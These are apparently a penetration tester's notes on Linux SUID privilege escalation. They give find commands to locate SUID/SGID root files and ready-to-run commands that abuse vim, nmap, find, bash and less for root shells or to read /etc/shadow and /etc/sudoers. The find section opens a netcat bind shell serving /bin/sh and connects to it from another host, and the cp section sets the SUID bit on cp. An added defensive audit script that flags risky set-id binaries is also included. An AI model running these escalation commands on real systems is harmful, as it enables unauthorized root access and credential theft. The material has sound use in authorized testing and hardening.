SUID NOTES

VALUES

Octal mode bits (the find commands below use them as -perm -4000 / -perm -2000):

1000 = Sticky Bit

2000 = SGID (set-group-ID)

4000 = SUID (set-user-ID; shows as -rwsr-xr-x in ls -l)


========================================

| FIND COMMANDS THAT ARE EXPLOITABLE   |

========================================

# SUID files owned by root, listed with their permissions (errors from unreadable directories discarded)

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

or

find / -user root -perm -4000 -print 2>/dev/null

# SGID files owned by root (-perm /2000: the old +2000 form is rejected by current GNU find)

find / -perm /2000 -user root -type f -print 2>/dev/null
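A defender-side audit built from the find commands above, added here as an example (it is not part of the original notes): it lists every SUID/SGID file under a directory and flags the binaries the sections below single out (vim, nmap, find, bash, less, cp). WATCHLIST, the function names and the output format are my own assumptions, and it relies on GNU find's -printf.

```shell
#!/bin/sh
# Added audit helper, not part of the original notes. WATCHLIST, the function
# names and the output format are assumptions of mine. Uses GNU find -printf.

# Basenames the notes treat as shell-capable when they carry a set-id bit.
WATCHLIST="vim vim.tiny vim.basic nmap find bash less cp"

# Print "octal-mode owner path" for every regular file below $1 that has the
# SUID (4000) or SGID (2000) bit set. The owner is printed rather than
# filtered so non-root set-id files show up too. Errors from unreadable
# directories are discarded, as in the notes' find commands.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %p\n' 2>/dev/null
}

# Exit 0 when the basename of $1 is on the watch list, 1 otherwise.
is_watched() {
    base=$(basename "$1")
    for w in $WATCHLIST; do
        [ "$base" = "$w" ] && return 0
    done
    return 1
}

# Report every set-id file, tagging watch-listed ones RISK and the rest ok.
audit_setid() {
    list_setid "$1" | while read -r mode owner path; do
        if is_watched "$path"; then
            echo "RISK $mode $owner $path"
        else
            echo "ok   $mode $owner $path"
        fi
    done
}

# Print how many set-id files under $1 are on the watch list (for alerting).
count_flagged() {
    audit_setid "$1" | grep -c '^RISK' || true
}

# Run against the live system (needs read access to the tree):
#   audit_setid /
```

Run it periodically and diff the output against a known-good baseline; any new RISK line, or any new set-id file at all, is worth an incident ticket.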



========================================

| EXPLOIT THOSE COMMANDS               |

========================================

VIM:

---------------------------------------

vim.tiny /etc/shadow

vim.tiny

# Press ESC key

:set shell=/bin/sh

:shell

vim.basic /root/.bashrc

(Create a ROOT shell)

vim.basic /etc/sudoers

(Reads file as ROOT)

---------------------------------------

NMAP:

---------------------------------------

nmap --interactive

# Interactive mode only exists in old Nmap releases; it was removed from current versions.



---------------------------------------

FIND:

---------------------------------------

touch pentestlab

find pentestlab -exec whoami \;

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Connecting to the listening port from another host gives a root shell.

---------------------------------------

# from the connecting host:

netcat 192.168.1.189 5555

id

cat /etc/sh



---------------------------------------

BASH:

---------------------------------------

bash -p

# -p stops bash from dropping the effective uid back to the real uid



---------------------------------------

LESS:

---------------------------------------

less /etc/passwd

!/bin/sh



---------------------------------------

CP:

---------------------------------------

which cp

ls -al /bin/cp

chmod u+s /bin/cp